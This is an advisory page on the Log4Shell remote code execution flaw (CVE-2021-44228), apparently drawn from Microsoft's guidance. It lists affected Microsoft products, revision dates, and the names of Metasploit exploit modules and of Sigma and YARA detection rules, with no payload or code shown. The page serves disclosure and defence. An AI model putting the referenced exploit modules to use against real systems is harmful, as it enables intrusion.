CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability

Overview

Severity

N/A

Category

Remote Code Execution

Exploit Status

Actively Exploited

Publicly Disclosed

Yes

Patch Tuesday

2021-Dec

Released

2021-12-16

Last Updated

2022-01-20

EPSS Score

94.36% (percentile: 100.0%)

Description

Certain versions of Apache Log4j2 are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Microsoft is not aware of any impact to the security of our enterprise services and has not experienced any degradation in the reliability or availability of those services as a result of this vulnerability. The Microsoft services detailed in the Security Updates table require customers to take action by downloading and installing security updates to mitigate the risks posed by this vulnerability on their deployments. Other Microsoft services require customers to apply configuration changes to mitigate the risks. These are listed in the MSRC blog: MSRC Blog: Microsoft’s Response to CVE-2021-44228 Apache Log4j 2 – Microsoft Security Response Center Additional information can be found in the Security Product Blog: Security Product Blog: Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog Recommended Actions The Microsoft services detailed in the Security Updates table require customers to take action by downloading and installing security updates to mitigate the risks posed by this vulnerability on their deployments. If we identify additional services which require customers to take action, we will notify them via Azure Service Health Notifications. If you are using any Microsoft services other than those explicitly listed there is no action required by you at this time. How to get notified of updates to this CVE If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

Detection & Weaponization (5 sources)

Maturity: Detection

• Metasploit modules: Log4Shell HTTP Scanner, MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell), Log4Shell HTTP Header Injection, UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell), VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
• Nuclei templates: Apache Log4j2 Remote Code Injection
• Sigma rules: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon, Log4j RCE CVE-2021-44228 Generic, Log4j RCE CVE-2021-44228 in Fields
• YARA rules: expl_log4j_cve_2021_44228.yar, SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1, SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC, SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard, SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21, SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21, SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1, SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
• GitHub PoC: 399 repositories

Affected Products (15)

Azure

• Azure Spring Cloud
• Cosmos DB Kafka Connector
• Events Hub Extension
• Minecraft Java Edition
• Azure Arc-enabled Data Services
• Azure Databricks
• Azure VMware Solution
• Azure Data Lake Store Java client SDK
• Azure Data Lake Store Java tool
• Azure Application Insights Java SDK

System Center

• Microsoft Defender for IoT

SQL Server

• SQL Server 2019 Big Data Clusters

Developer Tools

• Team Foundation Server
• Azure DevOps
• Azure DevOps Server

Security Updates (5)

• Current Info
• Additional Information
• Additional Information
• Release Notes
• Additional Information

Revision History

• 2021-12-16: Information published.
• 2021-12-20: Added Azure DevOps, Azure DevOps Server, and Team Foundation Server to the Security Updates table with links to more information about CVE-2021-44228. This is an informational change only.
• 2021-12-21: (1) Moved the products in the Customer Guidance Table to the Security Updates table. (2) Updated the Publicly Disclosed and Exploited settings to Yes. These are informational changes only. (3) Added Azure Data Lake Store Java tool and Azure Data Lake Store Java client SDK to the Security Updates table.
• 2021-12-22: Added Azure Application Insights Java SDK to the Security Updates table. This is an informational update only.
• 2022-01-20: Updated the executive summary with current information. This is an informational change only.